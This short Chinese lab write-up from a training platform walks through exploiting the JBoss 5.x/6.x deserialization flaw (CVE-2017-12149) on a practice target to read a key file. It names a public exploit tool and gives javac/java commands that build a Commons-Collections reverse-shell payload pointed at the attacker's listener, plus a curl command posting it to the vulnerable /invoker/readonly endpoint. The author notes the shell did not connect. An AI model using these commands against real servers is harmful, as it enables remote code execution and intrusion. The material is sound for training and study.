https://www.mozhe.cn/bug/detail/bVk4Z1hPRktPZStBVWV6QUw2YmY0dz09bW96aGUmozhe
背景介绍
JBoss 5.x / 6.x反序列化漏洞分析溯源
实训目标
1、了解JBoss 5.x / 6.x反序列化漏洞形成原理; 2、掌握JBoss 5.x / 6.x反序列化漏洞利用方法;
解题方向
利用JBoss 5.x / 6.x反序列化漏洞执行任意代码。 key在根目录;
访问JBoss漏洞页面,响应码500,证明漏洞存在
http://219.153.49.228:43015/invoker/readonly
法一:
利用反序列化工具https://github.com/yunxu1/jboss-_CVE-2017-12149
cat /key.txt 得到key
法二:使用Kali反弹shell
下载漏洞利用脚本到本地http://scan.javasec.cn/java/JavaDeserH2HC.zip
编译预置 Payload 的 Java 文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java运行以下命令,生成的反序列化对象:
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.220.128:9999Kali监听9999:
使用 curl 命令向http://219.153.49.228:43015/invoker/readonly提交生成的反序列化对象:
curl -v http://219.153.49.228:43015/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser不知道为什么没反弹成功